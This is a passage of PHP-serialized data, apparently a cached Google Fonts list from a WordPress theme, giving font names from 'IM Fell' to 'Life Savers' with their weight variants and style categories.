Canon\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"IM Fell French Canon SC\";a:3:{s:5:\"label\";s:23:\"IM Fell French Canon SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"IM Fell Great Primer\";a:3:{s:5:\"label\";s:20:\"IM Fell Great Primer\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"IM Fell Great Primer SC\";a:3:{s:5:\"label\";s:23:\"IM Fell Great Primer SC\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Ibarra Real Nova\";a:3:{s:5:\"label\";s:16:\"Ibarra Real Nova\";s:8:\"variants\";a:8:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Iceberg\";a:3:{s:5:\"label\";s:7:\"Iceberg\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Iceland\";a:3:{s:5:\"label\";s:7:\"Iceland\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Imbue\";a:3:{s:5:\"label\";s:5:\"Imbue\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Imprima\";a:3:{s:5:\"label\";s:7:\"Imprima\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Inconsolata\";a:3:{s:5:\"label\";s:11:\"Inconsolata\";s:8:\"variants\";a:8:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:3:\"900\";i:7;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:5:\"Inder\";a:3:{s:5:\"label\";s:5:\"Inder\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Indie Flower\";a:3:{s:5:\"label\";s:12:\"Indie Flower\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:5:\"Inika\";a:3:{s:5:\"label\";s:5:\"Inika\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Inknut Antiqua\";a:3:{s:5:\"label\";s:14:\"Inknut Antiqua\";s:8:\"variants\";a:7:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Inria Sans\";a:3:{s:5:\"label\";s:10:\"Inria Sans\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Inria Serif\";a:3:{s:5:\"label\";s:11:\"Inria Serif\";s:8:\"variants\";a:6:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";i:4;s:6:\"italic\";i:5;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Inter\";a:3:{s:5:\"label\";s:5:\"Inter\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Irish Grover\";a:3:{s:5:\"label\";s:12:\"Irish Grover\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Istok Web\";a:3:{s:5:\"label\";s:9:\"Istok Web\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Italiana\";a:3:{s:5:\"label\";s:8:\"Italiana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Italianno\";a:3:{s:5:\"label\";s:9:\"Italianno\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Itim\";a:3:{s:5:\"label\";s:4:\"Itim\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:16:\"Jacques Francois\";a:3:{s:5:\"label\";s:16:\"Jacques Francois\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:23:\"Jacques Francois Shadow\";a:3:{s:5:\"label\";s:23:\"Jacques Francois Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Jaldi\";a:3:{s:5:\"label\";s:5:\"Jaldi\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"JetBrains Mono\";a:3:{s:5:\"label\";s:14:\"JetBrains Mono\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:14:\"Jim Nightshade\";a:3:{s:5:\"label\";s:14:\"Jim Nightshade\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Jockey One\";a:3:{s:5:\"label\";s:10:\"Jockey One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Jolly Lodger\";a:3:{s:5:\"label\";s:12:\"Jolly Lodger\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Jomhuria\";a:3:{s:5:\"label\";s:8:\"Jomhuria\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Jomolhari\";a:3:{s:5:\"label\";s:9:\"Jomolhari\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Josefin Sans\";a:3:{s:5:\"label\";s:12:\"Josefin Sans\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Josefin Slab\";a:3:{s:5:\"label\";s:12:\"Josefin Slab\";s:8:\"variants\";a:14:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Jost\";a:3:{s:5:\"label\";s:4:\"Jost\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Joti One\";a:3:{s:5:\"label\";s:8:\"Joti One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:3:\"Jua\";a:3:{s:5:\"label\";s:3:\"Jua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Judson\";a:3:{s:5:\"label\";s:6:\"Judson\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Julee\";a:3:{s:5:\"label\";s:5:\"Julee\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:15:\"Julius Sans One\";a:3:{s:5:\"label\";s:15:\"Julius Sans One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Junge\";a:3:{s:5:\"label\";s:5:\"Junge\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Jura\";a:3:{s:5:\"label\";s:4:\"Jura\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Just Another Hand\";a:3:{s:5:\"label\";s:17:\"Just Another Hand\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:23:\"Just Me Again Down Here\";a:3:{s:5:\"label\";s:23:\"Just Me Again Down Here\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:3:\"K2D\";a:3:{s:5:\"label\";s:3:\"K2D\";s:8:\"variants\";a:16:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:6:\"italic\";i:15;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Kadwa\";a:3:{s:5:\"label\";s:5:\"Kadwa\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Kalam\";a:3:{s:5:\"label\";s:5:\"Kalam\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Kameron\";a:3:{s:5:\"label\";s:7:\"Kameron\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Kanit\";a:3:{s:5:\"label\";s:5:\"Kanit\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kantumruy\";a:3:{s:5:\"label\";s:9:\"Kantumruy\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Karantina\";a:3:{s:5:\"label\";s:9:\"Karantina\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Karla\";a:3:{s:5:\"label\";s:5:\"Karla\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"800\";i:11;s:9:\"800italic\";i:12;s:6:\"italic\";i:13;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Karma\";a:3:{s:5:\"label\";s:5:\"Karma\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Katibeh\";a:3:{s:5:\"label\";s:7:\"Katibeh\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"Kaushan Script\";a:3:{s:5:\"label\";s:14:\"Kaushan Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Kavivanar\";a:3:{s:5:\"label\";s:9:\"Kavivanar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Kavoon\";a:3:{s:5:\"label\";s:6:\"Kavoon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Kdam Thmor\";a:3:{s:5:\"label\";s:10:\"Kdam Thmor\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Keania One\";a:3:{s:5:\"label\";s:10:\"Keania One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Kelly Slab\";a:3:{s:5:\"label\";s:10:\"Kelly Slab\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Kenia\";a:3:{s:5:\"label\";s:5:\"Kenia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Khand\";a:3:{s:5:\"label\";s:5:\"Khand\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Khmer\";a:3:{s:5:\"label\";s:5:\"Khmer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Khula\";a:3:{s:5:\"label\";s:5:\"Khula\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Kirang Haerang\";a:3:{s:5:\"label\";s:14:\"Kirang Haerang\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Kite One\";a:3:{s:5:\"label\";s:8:\"Kite One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kiwi Maru\";a:3:{s:5:\"label\";s:9:\"Kiwi Maru\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Knewave\";a:3:{s:5:\"label\";s:7:\"Knewave\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"KoHo\";a:3:{s:5:\"label\";s:4:\"KoHo\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kodchasan\";a:3:{s:5:\"label\";s:9:\"Kodchasan\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Kosugi\";a:3:{s:5:\"label\";s:6:\"Kosugi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Kosugi Maru\";a:3:{s:5:\"label\";s:11:\"Kosugi Maru\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kotta One\";a:3:{s:5:\"label\";s:9:\"Kotta One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Koulen\";a:3:{s:5:\"label\";s:6:\"Koulen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Kranky\";a:3:{s:5:\"label\";s:6:\"Kranky\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Kreon\";a:3:{s:5:\"label\";s:5:\"Kreon\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Kristi\";a:3:{s:5:\"label\";s:6:\"Kristi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Krona One\";a:3:{s:5:\"label\";s:9:\"Krona One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:4:\"Krub\";a:3:{s:5:\"label\";s:4:\"Krub\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Kufam\";a:3:{s:5:\"label\";s:5:\"Kufam\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Kulim Park\";a:3:{s:5:\"label\";s:10:\"Kulim Park\";s:8:\"variants\";a:10:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Kumar One\";a:3:{s:5:\"label\";s:9:\"Kumar One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Kumar One Outline\";a:3:{s:5:\"label\";s:17:\"Kumar One Outline\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Kumbh Sans\";a:3:{s:5:\"label\";s:10:\"Kumbh Sans\";s:8:\"variants\";a:3:{i:0;s:3:\"300\";i:1;s:3:\"700\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:6:\"Kurale\";a:3:{s:5:\"label\";s:6:\"Kurale\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:15:\"La Belle Aurore\";a:3:{s:5:\"label\";s:15:\"La Belle Aurore\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Lacquer\";a:3:{s:5:\"label\";s:7:\"Lacquer\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Laila\";a:3:{s:5:\"label\";s:5:\"Laila\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lakki Reddy\";a:3:{s:5:\"label\";s:11:\"Lakki Reddy\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Lalezar\";a:3:{s:5:\"label\";s:7:\"Lalezar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Lancelot\";a:3:{s:5:\"label\";s:8:\"Lancelot\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Langar\";a:3:{s:5:\"label\";s:6:\"Langar\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Lateef\";a:3:{s:5:\"label\";s:6:\"Lateef\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Lato\";a:3:{s:5:\"label\";s:4:\"Lato\";s:8:\"variants\";a:10:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"900\";i:7;s:9:\"900italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"League Script\";a:3:{s:5:\"label\";s:13:\"League Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"Leckerli One\";a:3:{s:5:\"label\";s:12:\"Leckerli One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Ledger\";a:3:{s:5:\"label\";s:6:\"Ledger\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:6:\"Lekton\";a:3:{s:5:\"label\";s:6:\"Lekton\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Lemon\";a:3:{s:5:\"label\";s:5:\"Lemon\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Lemonada\";a:3:{s:5:\"label\";s:8:\"Lemonada\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Lexend\";a:3:{s:5:\"label\";s:6:\"Lexend\";s:8:\"variants\";a:7:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:3:\"800\";i:6;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Deca\";a:3:{s:5:\"label\";s:11:\"Lexend Deca\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:10:\"Lexend Exa\";a:3:{s:5:\"label\";s:10:\"Lexend Exa\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Giga\";a:3:{s:5:\"label\";s:11:\"Lexend Giga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Mega\";a:3:{s:5:\"label\";s:11:\"Lexend Mega\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Peta\";a:3:{s:5:\"label\";s:11:\"Lexend Peta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Lexend Tera\";a:3:{s:5:\"label\";s:11:\"Lexend Tera\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Lexend Zetta\";a:3:{s:5:\"label\";s:12:\"Lexend Zetta\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Libre Barcode 128\";a:3:{s:5:\"label\";s:17:\"Libre Barcode 128\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:22:\"Libre Barcode 128 Text\";a:3:{s:5:\"label\";s:22:\"Libre Barcode 128 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:16:\"Libre Barcode 39\";a:3:{s:5:\"label\";s:16:\"Libre Barcode 39\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:25:\"Libre Barcode 39 Extended\";a:3:{s:5:\"label\";s:25:\"Libre Barcode 39 Extended\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:30:\"Libre Barcode 39 Extended Text\";a:3:{s:5:\"label\";s:30:\"Libre Barcode 39 Extended Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:21:\"Libre Barcode 39 Text\";a:3:{s:5:\"label\";s:21:\"Libre Barcode 39 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:24:\"Libre Barcode EAN13 Text\";a:3:{s:5:\"label\";s:24:\"Libre Barcode EAN13 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:17:\"Libre Baskerville\";a:3:{s:5:\"label\";s:17:\"Libre Baskerville\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Libre Caslon Display\";a:3:{s:5:\"label\";s:20:\"Libre Caslon Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:17:\"Libre Caslon Text\";a:3:{s:5:\"label\";s:17:\"Libre Caslon Text\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Libre Franklin\";a:3:{s:5:\"label\";s:14:\"Libre Franklin\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Life Savers\";a:3:{s:5:\"label\";s:11:\"Life 